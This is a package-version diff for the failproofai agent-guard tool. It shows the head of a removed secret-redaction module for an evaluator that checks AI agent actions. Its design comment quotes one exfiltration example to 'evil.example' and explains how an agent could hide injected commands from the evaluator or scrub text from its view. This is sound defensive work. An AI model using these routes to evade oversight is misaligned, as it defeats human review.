failproofai 1.0.7-beta.2 → 1.0.7
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/.next/standalone/.next/BUILD_ID +1 -1
- package/.next/standalone/.next/build-manifest.json +3 -3
- package/.next/standalone/.next/prerender-manifest.json +4 -4
- package/.next/standalone/.next/required-server-files.json +1 -1
- package/.next/standalone/.next/server/app/_global-error/page/server-reference-manifest.json +1 -1
- package/.next/standalone/.next/server/app/_global-error/page.js +4 -4
- package/.next/standalone/.next/server/app/_global-error/page.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/_global-error/page_client-reference-manifest.js +1 -1
- package/.next/standalone/.next/server/app/_global-error.html +1 -1
- package/.next/standalone/.next/server/app/_global-error.rsc +7 -7
- package/.next/standalone/.next/server/app/_global-error.segments/__PAGE__.segment.rsc +6 -6
- package/.next/standalone/.next/server/app/_global-error.segments/_full.segment.rsc +7 -7
- package/.next/standalone/.next/server/app/_global-error.segments/_tree.segment.rsc +1 -1
- package/.next/standalone/.next/server/app/_not-found/page/server-reference-manifest.json +1 -1
- package/.next/standalone/.next/server/app/_not-found/page.js +4 -4
- package/.next/standalone/.next/server/app/_not-found/page.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/_not-found/page_client-reference-manifest.js +1 -1
- package/.next/standalone/.next/server/app/_not-found.html +1 -1
- package/.next/standalone/.next/server/app/_not-found.rsc +15 -15
- package/.next/standalone/.next/server/app/_not-found.segments/_full.segment.rsc +15 -15
- package/.next/standalone/.next/server/app/_not-found.segments/_not-found/__PAGE__.segment.rsc +14 -14
- package/.next/standalone/.next/server/app/_not-found.segments/_tree.segment.rsc +2 -2
- package/.next/standalone/.next/server/app/api/audit/invite/route.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/api/audit/run/route.js +7 -8
- package/.next/standalone/.next/server/app/api/audit/run/route.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/api/audit/status/route.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/api/auth/login-request/route.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/api/auth/login-verify/route.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/api/auth/logout/route.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/api/auth/status/route.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/api/download/[project]/[session]/route.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/audit/page/server-reference-manifest.json +2 -2
- package/.next/standalone/.next/server/app/audit/page.js +5 -7
- package/.next/standalone/.next/server/app/audit/page.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/audit/page_client-reference-manifest.js +1 -1
- package/.next/standalone/.next/server/app/index.html +1 -1
- package/.next/standalone/.next/server/app/index.rsc +15 -15
- package/.next/standalone/.next/server/app/index.segments/__PAGE__.segment.rsc +14 -14
- package/.next/standalone/.next/server/app/index.segments/_full.segment.rsc +15 -15
- package/.next/standalone/.next/server/app/index.segments/_tree.segment.rsc +2 -2
- package/.next/standalone/.next/server/app/page/server-reference-manifest.json +1 -1
- package/.next/standalone/.next/server/app/page.js +6 -6
- package/.next/standalone/.next/server/app/page.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/page_client-reference-manifest.js +1 -1
- package/.next/standalone/.next/server/app/policies/page/server-reference-manifest.json +14 -14
- package/.next/standalone/.next/server/app/policies/page.js +11 -13
- package/.next/standalone/.next/server/app/policies/page.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/policies/page_client-reference-manifest.js +1 -1
- package/.next/standalone/.next/server/app/project/[name]/page/server-reference-manifest.json +1 -1
- package/.next/standalone/.next/server/app/project/[name]/page.js +7 -8
- package/.next/standalone/.next/server/app/project/[name]/page.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/project/[name]/page_client-reference-manifest.js +1 -1
- package/.next/standalone/.next/server/app/project/[name]/session/[sessionId]/page/react-loadable-manifest.json +2 -2
- package/.next/standalone/.next/server/app/project/[name]/session/[sessionId]/page/server-reference-manifest.json +2 -2
- package/.next/standalone/.next/server/app/project/[name]/session/[sessionId]/page.js +7 -7
- package/.next/standalone/.next/server/app/project/[name]/session/[sessionId]/page.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/project/[name]/session/[sessionId]/page_client-reference-manifest.js +1 -1
- package/.next/standalone/.next/server/app/projects/page/server-reference-manifest.json +1 -1
- package/.next/standalone/.next/server/app/projects/page.js +6 -7
- package/.next/standalone/.next/server/app/projects/page.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/projects/page_client-reference-manifest.js +1 -1
- package/.next/standalone/.next/server/app/settings/page/server-reference-manifest.json +8 -41
- package/.next/standalone/.next/server/app/settings/page.js +9 -12
- package/.next/standalone/.next/server/app/settings/page.js.nft.json +1 -1
- package/.next/standalone/.next/server/app/settings/page_client-reference-manifest.js +1 -1
- package/.next/standalone/.next/server/chunks/{[externals]__1j-zsg5._.js → [externals]__1_bftcl._.js} +1 -1
- package/.next/standalone/.next/server/chunks/{[externals]__19_pzeq._.js → [externals]__1msfs-h._.js} +1 -1
- package/.next/standalone/.next/server/chunks/[root-of-the-server]__0l3yhx4._.js +2 -2
- package/.next/standalone/.next/server/chunks/[root-of-the-server]__0o07qi9._.js +1 -1
- package/.next/standalone/.next/server/chunks/{[root-of-the-server]__1bf34x4._.js → [root-of-the-server]__1_r2rbg._.js} +7 -5
- package/.next/standalone/.next/server/chunks/_09dz7xv._.js +21 -21
- package/.next/standalone/.next/server/chunks/_0tovk6q._.js +1 -1
- package/.next/standalone/.next/server/chunks/_0trp3yc._.js +1 -1
- package/.next/standalone/.next/server/chunks/{_1q5i8mb._.js → _1c3k-8x._.js} +2 -2
- package/.next/standalone/.next/server/chunks/_1ek68ln._.js +16 -16
- package/.next/standalone/.next/server/chunks/package_json_[json]_cjs_1nxcc4v._.js +1 -1
- package/.next/standalone/.next/server/chunks/src_hooks_0iu54mz._.js +3 -0
- package/.next/standalone/.next/server/chunks/src_hooks_custom-hooks-loader_ts_0lnb3n3._.js +2 -4
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0-_ki57._.js +4 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__013jr2b._.js +4 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__01wy8d-._.js +4 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__02npjtd._.js +4 -0
- package/.next/standalone/.next/server/chunks/ssr/{[root-of-the-server]__0l44ual._.js → [root-of-the-server]__0bd3mje._.js} +2 -2
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0cg-bgc._.js +5 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0cpu_mj._.js +3 -0
- package/.next/standalone/.next/server/chunks/ssr/{[root-of-the-server]__1mf3zp6._.js → [root-of-the-server]__0cxe_2_._.js} +3 -3
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0da85px._.js +4 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0ftmoxc._.js +4 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0p-5p8u._.js +4 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0u3w0ll._.js +22 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__17d_ffl._.js +3 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__19d9tgz._.js +5 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__1ctpynv._.js +3 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__1jiwfsj._.js +3 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__1p2otjt._.js +4 -0
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__1phc187._.js +3 -0
- package/.next/standalone/.next/server/chunks/ssr/_06imw3p._.js +5 -0
- package/.next/standalone/.next/server/chunks/ssr/_08x1r5t._.js +1 -1
- package/.next/standalone/.next/server/chunks/ssr/{_1w_5l7t._.js → _0h_douw._.js} +1 -1
- package/.next/standalone/.next/server/chunks/ssr/{_1mel6y1._.js → _1-i_gzc._.js} +2 -2
- package/.next/standalone/.next/server/chunks/ssr/{_1v-jvrv._.js → _166t73i._.js} +1 -1
- package/.next/standalone/.next/server/chunks/ssr/{_1q46vxx._.js → _1_qswah._.js} +2 -2
- package/.next/standalone/.next/server/chunks/ssr/{_1gb0ifp._.js → _1es2j7i._.js} +5 -5
- package/.next/standalone/.next/server/chunks/ssr/_1u8-lu2._.js +3 -0
- package/.next/standalone/.next/server/chunks/ssr/_1zopuov._.js +1 -1
- package/.next/standalone/.next/server/chunks/ssr/_next-internal_server_app_policies_page_actions_1sp2-yo.js +2 -2
- package/.next/standalone/.next/server/chunks/ssr/app_audit__components_audit-dashboard_tsx_0p9ud47._.js +1 -1
- package/.next/standalone/.next/server/chunks/ssr/app_global-error_tsx_1kp6l3x._.js +1 -1
- package/.next/standalone/.next/server/chunks/ssr/app_policies_hooks-client_tsx_19dqvpc._.js +2 -2
- package/.next/standalone/.next/server/chunks/ssr/app_settings_settings-client_tsx_20lq-mq._.js +3 -0
- package/.next/standalone/.next/server/chunks/ssr/{node_modules_next_dist_0w6mzq5._.js → node_modules_next_dist_0drixxt._.js} +4 -4
- package/.next/standalone/.next/server/chunks/ssr/src_hooks_1cv9_c4._.js +10 -0
- package/.next/standalone/.next/server/chunks/ssr/src_hooks_builtin-policies_ts_09j2ndl._.js +1 -1
- package/.next/standalone/.next/server/chunks/ssr/src_hooks_fp-home_ts_0je3xkv._.js +1 -1
- package/.next/standalone/.next/server/chunks/ssr/src_hooks_pack-cli_ts_0t7me65._.js +1 -1
- package/.next/standalone/.next/server/middleware-build-manifest.js +3 -3
- package/.next/standalone/.next/server/pages/404.html +1 -1
- package/.next/standalone/.next/server/pages/500.html +1 -1
- package/.next/standalone/.next/server/server-reference-manifest.js +1 -1
- package/.next/standalone/.next/server/server-reference-manifest.json +23 -56
- package/.next/standalone/.next/static/chunks/094xgi4owxaqf.js +1 -0
- package/.next/standalone/.next/static/chunks/{129ag2bw93bdh.js → 0__8a7m868fvf.js} +1 -1
- package/.next/standalone/.next/static/chunks/{3ugmd_7dyn0id.js → 0o6qlkgubtoex.js} +1 -1
- package/.next/standalone/.next/static/chunks/{0fqd7m_u81mi5.js → 13i7-9is-vhys.js} +1 -1
- package/.next/standalone/.next/static/chunks/1rz20_pz828f3.js +6 -0
- package/.next/standalone/.next/static/chunks/2k9f4tyv04809.css +1 -0
- package/.next/standalone/.next/static/chunks/{2_pltstd8-xgs.js → 2klitrtzpaoe0.js} +1 -1
- package/.next/standalone/.next/static/chunks/{3brze37td_wnc.js → 2mdh397ghgnvv.js} +1 -1
- package/.next/standalone/.next/static/chunks/2rshywgeqsyzk.css +2 -0
- package/.next/standalone/.next/static/chunks/3pzx4chkhko9k.js +1 -0
- package/.next/standalone/.next/static/chunks/3rh5o7e16irrm.js +69 -0
- package/.next/standalone/.next/static/chunks/{1qd741hzlmjbo.js → 43ufqrz8qo3h-.js} +1 -1
- package/.next/standalone/SECURITY.md +53 -0
- package/.next/standalone/app/actions/pack-actions.ts +0 -12
- package/.next/standalone/app/policies/hooks-client.tsx +0 -9
- package/.next/standalone/app/settings/page.tsx +1 -20
- package/.next/standalone/app/settings/settings-client.tsx +1 -27
- package/.next/standalone/app/settings/settings.css +0 -79
- package/.next/standalone/package.json +10 -10
- package/.next/standalone/sdk/typescript/CHANGELOG.md +15 -1
- package/.next/standalone/sdk/typescript/integration/fixtures/ai-4/package-lock.json +10 -30
- package/.next/standalone/sdk/typescript/integration/fixtures/ai-4/package.json +3 -0
- package/.next/standalone/sdk/typescript/integration/fixtures/ai-5/package-lock.json +4 -16
- package/.next/standalone/sdk/typescript/integration/fixtures/ai-5/package.json +3 -0
- package/.next/standalone/sdk/typescript/integration/fixtures/langchain-0.3/package-lock.json +13 -132
- package/.next/standalone/sdk/typescript/integration/fixtures/langchain-0.3/package.json +4 -0
- package/.next/standalone/sdk/typescript/integration/fixtures/langchain-dup-core/package-lock.json +4 -142
- package/.next/standalone/sdk/typescript/integration/fixtures/langchain-dup-core/package.json +4 -0
- package/.next/standalone/sdk/typescript/integration/fixtures/mastra-0/package-lock.json +1396 -1016
- package/.next/standalone/sdk/typescript/integration/fixtures/mastra-0/package.json +9 -0
- package/.next/standalone/server.js +1 -1
- package/README.md +2 -2
- package/bin/failproofai.mjs +2 -115
- package/dist/cli.mjs +6543 -13872
- package/dist/index.js +1 -19
- package/dist/worker.mjs +2022 -8055
- package/package.json +10 -10
- package/pi-extension/index.ts +0 -11
- package/scripts/build-policy-pack.mjs +2 -53
- package/src/audit/features.ts +2 -3
- package/src/hooks/builtin-policies.ts +8 -177
- package/src/hooks/cloud-enrollment-cli.ts +1 -1
- package/src/hooks/cloud-managed-policies.ts +0 -22
- package/src/hooks/custom-hooks-loader.ts +7 -45
- package/src/hooks/custom-hooks-registry.ts +1 -45
- package/src/hooks/first-run-gate.ts +0 -5
- package/src/hooks/fp-home.ts +0 -23
- package/src/hooks/handler.ts +6 -265
- package/src/hooks/hook-activity-store.ts +1 -105
- package/src/hooks/hook-telemetry.ts +0 -41
- package/src/hooks/loader-utils.ts +0 -6
- package/src/hooks/manager.ts +1 -1
- package/src/hooks/pack-cli.ts +19 -412
- package/src/hooks/pack-manifest.ts +7 -479
- package/src/hooks/pack-store.ts +11 -157
- package/src/hooks/policy-catalog.ts +0 -204
- package/src/hooks/policy-evaluator.ts +796 -940
- package/src/hooks/policy-registry.ts +0 -25
- package/src/hooks/policy-types.ts +0 -126
- package/src/hooks/types.ts +1 -1
- package/src/hooks/worker-server.ts +26 -119
- package/src/index.ts +0 -6
- package/.next/standalone/.next/server/chunks/src_hooks_01frwmb._.js +0 -5
- package/.next/standalone/.next/server/chunks/src_hooks_18qtd42._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__01bmjsj._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__04usis8._.js +0 -4
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__056wjo4._.js +0 -4
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__059yza8._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0eip4_k._.js +0 -22
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0n0xg95._.js +0 -4
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0qcb0mg._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0qxnccm._.js +0 -5
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0rwtwpm._.js +0 -4
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0s_yomn._.js +0 -4
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0soxz2z._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__0yrsbd_._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__11mayhe._.js +0 -4
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__13d-wb6._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__1dinjii._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__1pprgri._.js +0 -4
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__1q4p5b8._.js +0 -4
- package/.next/standalone/.next/server/chunks/ssr/[root-of-the-server]__1qiz0e4._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/_042cgl1._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/_0bqoto4._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/_0uyu3jf._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/_1feuvhb._.js +0 -5
- package/.next/standalone/.next/server/chunks/ssr/app_actions_get-scheduled-audit_ts_0ei9sni._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/app_settings_02tf1h4._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/node_modules_next_dist_18_d8l1._.js +0 -151
- package/.next/standalone/.next/server/chunks/ssr/src_hooks_095a_79._.js +0 -5
- package/.next/standalone/.next/server/chunks/ssr/src_hooks_15t8kqj._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/src_hooks_18k8rl0._.js +0 -12
- package/.next/standalone/.next/server/chunks/ssr/src_hooks_1fm2w5z._.js +0 -3
- package/.next/standalone/.next/server/chunks/ssr/src_hooks_1j0zy3v._.js +0 -3
- package/.next/standalone/.next/static/chunks/043j99m8ykg__.css +0 -2
- package/.next/standalone/.next/static/chunks/2c8j9l6j_b1ci.js +0 -1
- package/.next/standalone/.next/static/chunks/2qv4hshejedtx.css +0 -1
- package/.next/standalone/.next/static/chunks/3-k569wzcli8q.js +0 -1
- package/.next/standalone/.next/static/chunks/3otmypm6j_xfo.js +0 -6
- package/.next/standalone/.next/static/chunks/3yxro_r2_o9ad.js +0 -69
- package/.next/standalone/PROBE-FOLLOWUP.md +0 -186
- package/.next/standalone/app/actions/get-jev-config.ts +0 -424
- package/.next/standalone/app/actions/update-jev-config.ts +0 -420
- package/.next/standalone/app/components/jev-notices.tsx +0 -96
- package/.next/standalone/app/settings/jev-panel.tsx +0 -473
- package/src/hooks/effective-reviewers.ts +0 -79
- package/src/hooks/jev-activity.ts +0 -385
- package/src/hooks/jev-cli.ts +0 -1249
- package/src/hooks/policy-authority.ts +0 -333
- package/src/hooks/policy-reviewability.ts +0 -229
- package/src/hooks/semantic/combine.ts +0 -541
- package/src/hooks/semantic/compile.ts +0 -176
- package/src/hooks/semantic/decide.ts +0 -392
- package/src/hooks/semantic/envelope.ts +0 -1296
- package/src/hooks/semantic/evaluator.ts +0 -547
- package/src/hooks/semantic/facts.ts +0 -292
- package/src/hooks/semantic/intent.ts +0 -1190
- package/src/hooks/semantic/jev-client.ts +0 -643
- package/src/hooks/semantic/jev-config.ts +0 -594
- package/src/hooks/semantic/jev-review.ts +0 -374
- package/src/hooks/semantic/jev-stats.ts +0 -289
- package/src/hooks/semantic/jev-throttle.ts +0 -421
- package/src/hooks/semantic/pack-policies.ts +0 -251
- package/src/hooks/semantic/policies.ts +0 -596
- package/src/hooks/semantic/precondition-names.ts +0 -60
- package/src/hooks/semantic/preconditions.ts +0 -58
- package/src/hooks/semantic/redact.ts +0 -2910
- package/src/hooks/semantic/types.ts +0 -145
- package/src/hooks/semver-precedence.ts +0 -128
- /package/.next/standalone/.next/static/{gbEOjBgZAxF2UIUwZVHNu → PgeWCHmyVbjRznv2VO7KF}/_buildManifest.js +0 -0
- /package/.next/standalone/.next/static/{gbEOjBgZAxF2UIUwZVHNu → PgeWCHmyVbjRznv2VO7KF}/_clientMiddlewareManifest.js +0 -0
- /package/.next/standalone/.next/static/{gbEOjBgZAxF2UIUwZVHNu → PgeWCHmyVbjRznv2VO7KF}/_ssgManifest.js +0 -0
|
@@ -1,2910 +0,0 @@
|
|
|
1
|
-
/**
|
|
2
|
-
* Secret redaction for everything that leaves the machine in a Jev request.
|
|
3
|
-
*
|
|
4
|
-
* Two layers, deliberately different in how wide they cast:
|
|
5
|
-
*
|
|
6
|
-
* 1. **The shared floor**: `SECRET_PATTERNS`, the list the `sanitize-*`
|
|
7
|
-
* builtins BLOCK on. Blocking has to be narrow, because a false positive
|
|
8
|
-
* there denies work the user wanted.
|
|
9
|
-
* 2. **The redactor's own margin**, everything else in this file. Redaction only
|
|
10
|
-
* swaps characters for a marker, and a false positive costs Jev a few
|
|
11
|
-
* characters of context it almost never needs to judge an action, while a
|
|
12
|
-
* miss sends a live credential to a third-party API. So this layer takes the
|
|
13
|
-
* shapes the floor cannot afford: assignments named like a secret
|
|
14
|
-
* (`GITHUB_TOKEN=…`, `"api_key": "…"`, `--password …`), header values,
|
|
15
|
-
* credentials inside URLs, whole PEM blocks, the values of this process's own
|
|
16
|
-
* secret-named environment variables, and long random-looking tokens.
|
|
17
|
-
*
|
|
18
|
-
* It is the same split `src/audit/redact-example.ts` makes, for the same reason.
|
|
19
|
-
*
|
|
20
|
-
* Every replacement is a visible `<redacted:label>` marker, never a silent
|
|
21
|
-
* deletion, so Jev can still see THAT a secret was there (which matters to the
|
|
22
|
-
* `secret-exposure` policy) and the count is auditable. Only the value is
|
|
23
|
-
* replaced: `OPENAI_API_KEY=<redacted:…>` still says which credential it was.
|
|
24
|
-
*
|
|
25
|
-
* Two of the margin's rules are deliberately BLUNT, and it is worth knowing
|
|
26
|
-
* why before narrowing them. A credential header (`Authorization`,
|
|
27
|
-
* `Proxy-Authorization`, `X-Authorization`, `api-key`, `x-api-key`, `Cookie`,
|
|
28
|
-
* `Set-Cookie`) and a credential FLAG (`--password`, `--token`, `sshpass -p`
|
|
29
|
-
* and the rest of `CREDENTIAL_FLAGS` / `GATED_CREDENTIAL_FLAGS`) give up their
|
|
30
|
-
* whole value: to the end of the line, or to the closing quote when the value
|
|
31
|
-
* sits inside one, and to the end of the argument for a flag. Nothing about
|
|
32
|
-
* the value is examined — not a scheme allowlist, not a token shape, not
|
|
33
|
-
* whether it reads like code or like a reference.
|
|
34
|
-
*
|
|
35
|
-
* The name is read in every form it is written in: a header line, a `curl -H`
|
|
36
|
-
* argument, a JSON field, YAML — including a block scalar whose value is the
|
|
37
|
-
* bounded INDENTED BLOCK UNDERNEATH (`continuationValue`) — an env assignment, and the
|
|
38
|
-
* two-argument setter form `req.Header.Set("Authorization", "…")`, where the
|
|
39
|
-
* separator is a comma.
|
|
40
|
-
*
|
|
41
|
-
* Three boundaries are structural rather than blunt, and all three exist
|
|
42
|
-
* because a marker that swallows text hides an INJECTED command from the
|
|
43
|
-
* evaluator as readily as it hides a credential from Jev (see
|
|
44
|
-
* `credentialValueEnd`, `credentialArgumentEnd` and `continuationValue`): an
|
|
45
|
-
* unquoted value ends at the shell separator that starts a second command
|
|
46
|
-
* unless it has already taken a `name=` pair (a cookie or SigV4 list), an
|
|
47
|
-
* argument ends at the quote that closes the string the command itself sits
|
|
48
|
-
* in, and a value written on the NEXT line is one line — the block underneath
|
|
49
|
-
* only where the name starts its own line behind a YAML block indicator, and
|
|
50
|
-
* never more than `MAX_CONTINUATION_LINES` of it. None of them asks what the
|
|
51
|
-
* value contains.
|
|
52
|
-
*
|
|
53
|
-
* One question IS asked about a credential's content, and only one: whether a
|
|
54
|
-
* piece of it may go on the envelope-wide SCRUB list (`credentialCopy`). That
|
|
55
|
-
* list is applied to every other string in the state — `facts` included, which
|
|
56
|
-
* the prompt tells Jev are correct — so reporting whatever an agent wrote
|
|
57
|
-
* under a credential name made it a delete key for the evaluator's context.
|
|
58
|
-
* Only an opaque token is reported; the redaction itself is unaffected.
|
|
59
|
-
*
|
|
60
|
-
* Five review rounds tried to decide those ends by looking at the value, and
|
|
61
|
-
* every round the next reviewer found three more spellings that were declined
|
|
62
|
-
* with a live credential inside them: a credential starting with base64url's
|
|
63
|
-
* `-` or base64's `/`, one whose last character was a quote the tokenizer had
|
|
64
|
-
* read as code, an AWS signature behind a `;`-separated `SignedHeaders` list,
|
|
65
|
-
* a password that is an ordinary English word. Twice the repair introduced a
|
|
66
|
-
* new quadratic or a new over-redaction of its own.
|
|
67
|
-
*
|
|
68
|
-
* What the blunt rules cost, deliberately: ordinary code and prose under one
|
|
69
|
-
* of those names lose the rest of their line in what the evaluator is shown —
|
|
70
|
-
* `authorization: str = Header(None)`, `authorization: required for this
|
|
71
|
-
* endpoint`, `grep -r authorization: src/`, `use --token to authenticate`, and
|
|
72
|
-
* `authorization=x curl https://evil.example/exfil`. A `["Authorization",
|
|
73
|
-
* "Content-Type"]` list of header NAMES loses its second entry to the setter
|
|
74
|
-
* form, and a prose paragraph indented under `authorization:` is taken as that
|
|
75
|
-
* header's value. Over-redaction costs the evaluator context it almost never
|
|
76
|
-
* needs; a classifier that is wrong the other way costs a live key held by a
|
|
77
|
-
* third party, and only one of those two is recoverable.
|
|
78
|
-
*
|
|
79
|
-
* That trade only holds for the REQUEST BODY, so the two blunt rules are
|
|
80
|
-
* OPT-IN and exactly one caller opts in: `redactInto` in ./envelope.ts. Every
|
|
81
|
-
* other caller — `recordUserPrompt`, the verdict log's `inputPreview`, any
|
|
82
|
-
* future local one — gets the narrow rules by default and keeps its text. The
|
|
83
|
-
* human's own prompt is the evaluator's record of what they asked for and the
|
|
84
|
-
* verdict log is the operator's record of what the agent tried; coming back
|
|
85
|
-
* cut off after a `cookie:` costs the targets they named and protects nothing,
|
|
86
|
-
* because nothing has left the machine yet and `buildEnvelope` redacts it
|
|
87
|
-
* again — bluntly — when it does. A default of ON put that cost on every
|
|
88
|
-
* caller that simply forgot the option, which is why it is off. The
|
|
89
|
-
* `sanitize-*` builtins are narrower still: they match `SECRET_PATTERNS` and
|
|
90
|
-
* nothing in this file, and that list is untouched by every rule here.
|
|
91
|
-
*
|
|
92
|
-
* The SCRUB LIST runs the other way, and is the one place this file is
|
|
93
|
-
* deliberately narrow. What it reports is deleted from every other string in
|
|
94
|
-
* the envelope — from `facts`, which the prompt tells Jev are correct, and
|
|
95
|
-
* from the human's own words — so a rule that redacts on a NAME alone would
|
|
96
|
-
* otherwise hand the agent a way to delete text of its choosing from the
|
|
97
|
-
* evaluator's view of what the HUMAN asked for. Two lists come out of it:
|
|
98
|
-
* `found`, opaque tokens, scrubbed everywhere, and `weak`, tokens built from
|
|
99
|
-
* words (`api-v2-backup`, and the real corpus credential `dev-admin-key-9f3c`
|
|
100
|
-
* it cannot be told apart from), scrubbed out of `agent_request` and nowhere
|
|
101
|
-
* else. A scheme WORD reaches neither — decided by its shape, never by a list
|
|
102
|
-
* of scheme names, since an unknown scheme is still redacted like any value.
|
|
103
|
-
*
|
|
104
|
-
* Every scan on this path is LINEAR — character loops, `indexOf`, regexes
|
|
105
|
-
* with a consumed token boundary instead of a lookaround, and a forward-only
|
|
106
|
-
* cursor wherever one rule's question is asked at many positions — because
|
|
107
|
-
* these rules run over every string the envelope sends and a quadratic here
|
|
108
|
-
* is a stalled PreToolUse hook. `__tests__/hooks/semantic/redaction.test.ts`
|
|
109
|
-
* pins that with an adversarial fixture per rule, and
|
|
110
|
-
* `redaction-cost.test.ts` with half a megabyte of each of them. The last
|
|
111
|
-
* exception was the assignment rule: it matched the
|
|
112
|
-
* VALUE, which may hold `=`, so a delimiter-free run cost the square of its
|
|
113
|
-
* length (910 ms for one envelope). The name and its separator are matched
|
|
114
|
-
* now and the value is walked in code, as the header rule already did.
|
|
115
|
-
*
|
|
116
|
-
* This is a floor, not a guarantee. A secret that looks like ordinary prose will
|
|
117
|
-
* pass. What it does promise is that the formats seen leaking in practice — the
|
|
118
|
-
* 25-character `sk-` gateway keys among them — do not.
|
|
119
|
-
*/
|
|
120
|
-
import { SECRET_PATTERNS } from "../builtin-policies";
|
|
121
|
-
|
|
122
|
-
export interface Redacted {
|
|
123
|
-
text: string;
|
|
124
|
-
count: number;
|
|
125
|
-
}
|
|
126
|
-
|
|
127
|
-
export interface RedactedDetail extends Redacted {
|
|
128
|
-
/** The literal secrets that were replaced, for scrubbing their copies elsewhere. */
|
|
129
|
-
found: string[];
|
|
130
|
-
/**
|
|
131
|
-
* Secrets whose copies may be scrubbed out of the AGENT's own text but not
|
|
132
|
-
* out of the human's words or the facts.
|
|
133
|
-
*
|
|
134
|
-
* A credential header and a credential flag are redacted on their NAME, so
|
|
135
|
-
* whatever the agent wrote under one lands on the scrub list — and
|
|
136
|
-
* `scrubKnownSecrets` then deletes it from every other string in the
|
|
137
|
-
* envelope. A word-built token (`api-v2-backup`, `dark-mode-v2`) is both the
|
|
138
|
-
* shape of a real corpus credential (`dev-admin-key-9f3c`) and the shape of
|
|
139
|
-
* an ordinary directory name, so `echo cookie: api-v2-backup && ls` used to
|
|
140
|
-
* delete the human's own "remove the api-v2-backup directory" from
|
|
141
|
-
* `user_said`. Reporting it here keeps the scrub where the agent wrote it
|
|
142
|
-
* and leaves the two fields `how_to_read` tells Jev are trustworthy alone.
|
|
143
|
-
*/
|
|
144
|
-
weak: string[];
|
|
145
|
-
}
|
|
146
|
-
|
|
147
|
-
const marker = (label: string): string => `<redacted:${label}>`;
|
|
148
|
-
|
|
149
|
-
/**
|
|
150
|
-
* What a rule reports as it runs: how many replacements it made, the secrets
|
|
151
|
-
* whose copies are scrubbed out of the whole envelope, and the ones scrubbed
|
|
152
|
-
* out of the agent's request only (see `RedactedDetail.weak`).
|
|
153
|
-
*/
|
|
154
|
-
interface Counter {
|
|
155
|
-
n: number;
|
|
156
|
-
found: string[];
|
|
157
|
-
weak: string[];
|
|
158
|
-
}
|
|
159
|
-
|
|
160
|
-
/**
|
|
161
|
-
* Whether a match at `offset` starts a token. `\n`, `\r` and `\t` count as a
|
|
162
|
-
* boundary because several inputs are JSON-serialised before they get here, and
|
|
163
|
-
* there a secret at the start of a line follows the two characters `\` `n`.
|
|
164
|
-
*
|
|
165
|
-
* Checked in code, never as a regex lookbehind: a lookbehind drops JSC's regex
|
|
166
|
-
* JIT to its interpreter, which measured ~100µs per rule per 2 KB string — 3 ms
|
|
167
|
-
* of every envelope across the vendor list alone.
|
|
168
|
-
*/
|
|
169
|
-
function atTokenBoundary(whole: string, offset: number, tokenChars = /[A-Za-z0-9_-]/): boolean {
|
|
170
|
-
if (offset === 0 || !tokenChars.test(whole[offset - 1])) return true;
|
|
171
|
-
return offset >= 2 && whole[offset - 2] === "\\" && /[nrt]/.test(whole[offset - 1]);
|
|
172
|
-
}
|
|
173
|
-
|
|
174
|
-
